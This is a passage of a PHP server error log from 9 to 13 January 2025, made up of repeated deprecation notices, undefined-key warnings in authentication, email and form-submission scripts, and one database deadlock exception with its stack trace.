/home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 15:12:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:14:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:15:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:15:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:15:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:16:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 15:16:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 23:01:19 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [09-Jan-2025 23:01:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [09-Jan-2025 23:28:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 00:12:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 00:33:01 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 00:41:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:08:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:21:35 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:24:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 01:25:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:25:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:25:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:25:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 01:29:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 02:23:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:10:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:30:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:38:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 03:39:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 03:41:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 04:21:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 04:25:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 04:42:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 04:47:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 04:57:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 05:21:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 06:24:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 06:25:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:25:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:25:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:25:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:26:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:26:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:26:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:29:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:29:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:30:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:30:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:31:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:39:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:40:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:40:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:43:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:43:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:45:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:49:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:49:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:50:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:50:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 06:52:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:52:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 06:58:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [10-Jan-2025 07:05:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 07:08:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [10-Jan-2025 07:22:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [11-Jan-2025 12:29:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 04:14:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 06:55:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 12:21:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 12:22:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:22:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:23:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:24:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:24:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:24:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:25:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 12:26:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 20:12:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 20:25:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 21:12:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 21:42:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 22:10:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 22:12:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:12:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:13:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:27:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 22:28:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:28:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:28:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:29:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:30:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 22:30:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:25:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [12-Jan-2025 23:28:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:28:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:29:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:29:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:29:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:30:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:30:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [12-Jan-2025 23:32:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:17:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:17:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:21:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:30:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:35:05 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:36:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:36:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:36:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:36:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:37:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:37:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:38:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:55:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:56:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:57:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:57:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:57:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 00:57:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 00:58:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 01:45:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [13-Jan-2025 02:27:27 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [13-Jan-2025 02:28:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 02:29:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:08:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:08:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:26:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:26:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:30:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:39:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 03:47:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:48:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:53:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:54:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:54:45 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:55:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:55:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 03:56:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:37:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:45:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:45:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:46:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:58:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 04:59:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 05:03:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 05:30:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 05:36:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 05:38:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 06:21:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 06:25:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 11:26:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [13-Jan-2025 11:27:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [13-Jan-2025 11:27:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 